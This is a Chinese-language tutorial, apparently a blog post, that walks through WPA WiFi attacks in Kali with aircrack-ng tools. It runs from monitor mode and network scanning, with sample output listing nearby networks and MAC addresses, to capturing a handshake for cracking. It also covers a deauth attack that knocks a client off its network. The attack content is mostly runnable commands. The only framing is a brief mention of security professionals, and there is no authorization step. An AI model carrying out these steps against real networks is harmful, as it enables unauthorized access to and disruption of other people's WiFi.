详细演示了在Kali虚拟机中进行WiFi安全测试的步骤,包括关闭干扰服务、启动监听模式、扫描WiFi网络、捕获并保存握手包,以及使用deauth攻击获取数据包。文章以实用指南形式,为网络安全专业人士提供了WiFi渗透测试的基础操作
1. 关闭可能影响的服务
airmon-ng check kill
2. 查看可用的无线网卡
airmon-ng
3. 开启网卡监听模式
airmon-ng start wlan0
4. 扫描周围 wifi
airodump-ng wlan0
# airodump-ng wlan0
CH 5 ][ Elapsed: 1 min ][ 2024-07-09 12:19
BSSID PWR Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID
64:64:4A:28:B8:6E -6 93 3 0 1 360 WPA2 CCMP PSK Redmi_77EE 68:F0:B5:01:DE:10 -46 15 6 0 11 360 WPA2 CCMP PSK zzh CC:08:FB:2B:5E:3C -48 33 0 0 6 405 WPA2 CCMP PSK TP-LINK-1503 C8:F7:42:4B:27:D6 -50 18 0 0 6 65 WPA2 CCMP PSK 424b27d6 54:0D:F9:00:55:C4 -50 19 0 0 1 360 WPA2 CCMP PSK HUAWEI-LK 54:0D:F9:00:55:C9 -52 20 0 0 1 360 WPA2 CCMP PSK <length: 0> 56:A7:03:26:BF:F7 -54 4 1 0 1 540 WPA2 CCMP PSK WP2SfIN7priMzFrl A4:56:02:61:21:3D -54 10 3 0 1 270 WPA2 CCMP PSK 360WiFi-61213D EC:26:CA:AC:70:58 -55 10 0 0 6 405 WPA2 CCMP PSK TP-LINK_7058 54:A7:03:66:BF:F7 -55 6 1 0 1 540 WPA2 CCMP PSK TP-LINK_BFF7 28:D1:27:13:D1:E2 -56 10 0 0 6 130 WPA2 CCMP PSK Xiaomi_D1E1 38:15:4E:66:08:30 -56 6 0 0 11 130 WPA2 CCMP PSK CMCC-ZumH EE:9B:2D:B9:D7:F2 -47 7 0 0 9 360 WPA2 CCMP PSK <length: 0> 14:09:DC:C6:0D:68 -56 2 0 0 6 130 WPA2 CCMP PSK CMCC-MA2T 68:DB:54:54:A1:2D -55 2 0 0 4 130 WPA2 CCMP PSK @PHICOMM_1903
BSSID STATION PWR Rate Lost Frames Notes Probes
(not associated) 4E:31:31:E1:17:0E -15 0 - 1 0 2
5. 开始抓取握手包并保存成文件
airodump-ng -c 6 --s --bssid BC:E0:01:9D:88:C1 wlan0 -w test2
# -c 指定信道,一定要是上一步查到的要破解的wifi所用信道# -bssid 指定bssid值,一定要是上一步查到的要破解的wifi的bssid# -w 指定捕获的握手到保存到的文件名# --s 选项会在输出中显示接收的确认帧数量, 用于确认接收到的数据包
6. 主动出击获取握手包
aireplay-ng -0 2 -a BC:E0:01:9D:88:C1 -c 12:E0:1D:07:BF:F4 wlan0
# -0表示通知设备断开连接# 2表示deauth攻击次数,小点大点都行吧# -a指定仿造的wifi的mac地址(即bssid)# -c表示要让认证失效的设备的mac地址,在上一步中可以看到
此时会在指定的目录产生以下四个文件 .cap是抓取到握手包的数据包文件 出现 [ WPA handshake: … ] 表示抓包成功